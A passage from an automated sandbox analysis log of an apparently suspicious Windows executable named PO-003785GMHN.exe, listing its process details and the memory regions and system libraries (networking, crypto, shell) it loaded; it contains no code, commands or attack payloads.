# Flog Txt Version 1 # Analyzer Version: 4.3.0 # Analyzer Build Date: Sep 20 2021 05:59:55 # Log Creation Date: 28.09.2021 06:46:51.307 Process: id = "1" image_name = "po-003785gmhn.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\po-003785gmhn.exe" page_root = "0x4633c000" os_pid = "0x12b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x664" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 118 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 119 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 120 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 121 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 122 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 123 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 124 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 125 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 126 start_va = 0x400000 end_va = 0x4fefff monitored = 1 entry_point = 0x477a08 region_type = mapped_file name = "po-003785gmhn.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\po-003785gmhn.exe") Region: id = 127 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 128 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 129 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 130 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 131 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 132 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 272 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 273 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 274 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 275 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 276 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 277 start_va = 0x640000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 278 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 279 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 280 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 281 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 282 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 283 start_va = 0x73ee0000 end_va = 0x73f71fff monitored = 0 entry_point = 0x73f20380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 284 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 285 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 286 start_va = 0x743f0000 end_va = 0x74481fff monitored = 0 entry_point = 0x74428cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 287 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 288 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 289 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 290 start_va = 0x820000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 291 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 292 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 293 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 294 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 295 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 296 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 297 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 298 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 299 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 300 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 301 start_va = 0x6cd30000 end_va = 0x6cd37fff monitored = 0 entry_point = 0x6cd317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 302 start_va = 0x6cc90000 end_va = 0x6cd21fff monitored = 0 entry_point = 0x6cc9dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 303 start_va = 0x6cc50000 end_va = 0x6cc8dfff monitored = 0 entry_point = 0x6cc52150 region_type = mapped_file name = "url.dll" filename = "\\Windows\\SysWOW64\\url.dll" (normalized: "c:\\windows\\syswow64\\url.dll") Region: id = 304 start_va = 0x6ed30000 end_va = 0x6f8c8fff monitored = 0 entry_point = 0x6ef06970 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 305 start_va = 0x71af0000 end_va = 0x71dbafff monitored = 0 entry_point = 0x71d2c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 306 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 307 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 308 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 309 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 310 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 311 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 312 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 313 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 314 start_va = 0x740000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 315 start_va = 0x5c0000 end_va = 0x5e9fff monitored = 0 entry_point = 0x5c5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 316 start_va = 0x920000 end_va = 0xaa7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 317 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 318 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 319 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 320 start_va = 0xab0000 end_va = 0xc30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 321 start_va = 0xc40000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 322 start_va = 0x2040000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 323 start_va = 0x2160000 end_va = 0x2496fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 324 start_va = 0x5d0000 end_va = 0x5d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 325 start_va = 0x6ead0000 end_va = 0x6ecdefff monitored = 0 entry_point = 0x6eb7b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 326 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 327 start_va = 0x5f0000 end_va = 0x5f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 328 start_va = 0x24a0000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 329 start_va = 0x70040000 end_va = 0x700b4fff monitored = 0 entry_point = 0x70079a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 330 start_va = 0x25e0000 end_va = 0x27cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 331 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 332 start_va = 0x740000 end_va = 0x7fbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 333 start_va = 0x810000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 334 start_va = 0x5e0000 end_va = 0x5e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 335 start_va = 0x600000 end_va = 0x603fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 336 start_va = 0x74120000 end_va = 0x7423efff monitored = 0 entry_point = 0x74165980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 337 start_va = 0x610000 end_va = 0x610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 338 start_va = 0x6f920000 end_va = 0x6f93cfff monitored = 0 entry_point = 0x6f923b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 339 start_va = 0x620000 end_va = 0x621fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 340 start_va = 0x800000 end_va = 0x800fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 341 start_va = 0x2040000 end_va = 0x2044fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 342 start_va = 0x2150000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 343 start_va = 0x6cc10000 end_va = 0x6cc28fff monitored = 0 entry_point = 0x6cc1f090 region_type = mapped_file name = "olepro32.dll" filename = "\\Windows\\SysWOW64\\olepro32.dll" (normalized: "c:\\windows\\syswow64\\olepro32.dll") Region: id = 344 start_va = 0x701a0000 end_va = 0x703acfff monitored = 0 entry_point = 0x7028acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 345 start_va = 0x2050000 end_va = 0x2050fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002050000" filename = "" Region: id = 346 start_va = 0x2060000 end_va = 0x2060fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 347 start_va = 0x75e90000 end_va = 0x75eeefff monitored = 0 entry_point = 0x75e94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 348 start_va = 0x70170000 end_va = 0x70181fff monitored = 0 entry_point = 0x70174510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 349 start_va = 0x71970000 end_va = 0x7199efff monitored = 0 entry_point = 0x7197bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 350 start_va = 0x700d0000 end_va = 0x7016afff monitored = 0 entry_point = 0x7010f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 351 start_va = 0x2070000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 352 start_va = 0x20b0000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 353 start_va = 0x2110000 end_va = 0x2113fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 354 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 355 start_va = 0x27c0000 end_va = 0x27cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 356 start_va = 0x71a70000 end_va = 0x71abefff monitored = 0 entry_point = 0x71a7d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 357 start_va = 0x700c0000 end_va = 0x700c7fff monitored = 0 entry_point = 0x700c1fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 358 start_va = 0x74610000 end_va = 0x74616fff monitored = 0 entry_point = 0x74611e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 359 start_va = 0x20b0000 end_va = 0x20cafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 360 start_va = 0x6c370000 end_va = 0x6c393fff monitored = 0 entry_point = 0x6c374820 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 361 start_va = 0x6c340000 end_va = 0x6c362fff monitored = 0 entry_point = 0x6c348940 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll") Region: id = 362 start_va = 0x27d0000 end_va = 0x28cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 363 start_va = 0x20d0000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 364 start_va = 0x26e0000 end_va = 0x271ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 365 start_va = 0x28d0000 end_va = 0x29cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 366 start_va = 0x29d0000 end_va = 0x2acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029d0000" filename = "" Region: id = 367 start_va = 0x2ad0000 end_va = 0x2eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 368 start_va = 0x2eb0000 end_va = 0x2faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002eb0000" filename = "" Region: id = 369 start_va = 0x2fb0000 end_va = 0x30affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fb0000" filename = "" Region: id = 370 start_va = 0x719a0000 end_va = 0x71a23fff monitored = 0 entry_point = 0x719c6530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 371 start_va = 0x2120000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002120000" filename = "" Region: id = 372 start_va = 0x703b0000 end_va = 0x7052dfff monitored = 0 entry_point = 0x7042c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 373 start_va = 0x2130000 end_va = 0x2130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002130000" filename = "" Region: id = 374 start_va = 0x2720000 end_va = 0x275ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 375 start_va = 0x2fb0000 end_va = 0x30affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fb0000" filename = "" Region: id = 376 start_va = 0x71960000 end_va = 0x71967fff monitored = 0 entry_point = 0x71961920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 377 start_va = 0x71910000 end_va = 0x71956fff monitored = 0 entry_point = 0x719258d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 378 start_va = 0x73c30000 end_va = 0x73c4afff monitored = 0 entry_point = 0x73c39050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 379 start_va = 0x30b0000 end_va = 0x34aafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030b0000" filename = "" Region: id = 380 start_va = 0x2140000 end_va = 0x2147fff monitored = 0 entry_point = 0x21419c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 381 start_va = 0x6fef0000 end_va = 0x6ff53fff monitored = 0 entry_point = 0x6ff0afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 382 start_va = 0x76160000 end_va = 0x762d7fff monitored = 0 entry_point = 0x761b8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 383 start_va = 0x76c10000 end_va = 0x76c1dfff monitored = 0 entry_point = 0x76c15410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 384 start_va = 0x2140000 end_va = 0x2141fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 385 start_va = 0x6fee0000 end_va = 0x6feeffff monitored = 0 entry_point = 0x6fee4600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 386 start_va = 0x6fec0000 end_va = 0x6fedffff monitored = 0 entry_point = 0x6fecd120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 387 start_va = 0x6fe90000 end_va = 0x6febbfff monitored = 0 entry_point = 0x6feabb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 388 start_va = 0x2760000 end_va = 0x2760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 389 start_va = 0x6fe60000 end_va = 0x6fe67fff monitored = 0 entry_point = 0x6fe61d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 390 start_va = 0x74240000 end_va = 0x74281fff monitored = 0 entry_point = 0x74256f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 391 start_va = 0x6fe40000 end_va = 0x6fe52fff monitored = 0 entry_point = 0x6fe49950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 392 start_va = 0x6fe10000 end_va = 0x6fe3efff monitored = 0 entry_point = 0x6fe295e0 region_type = 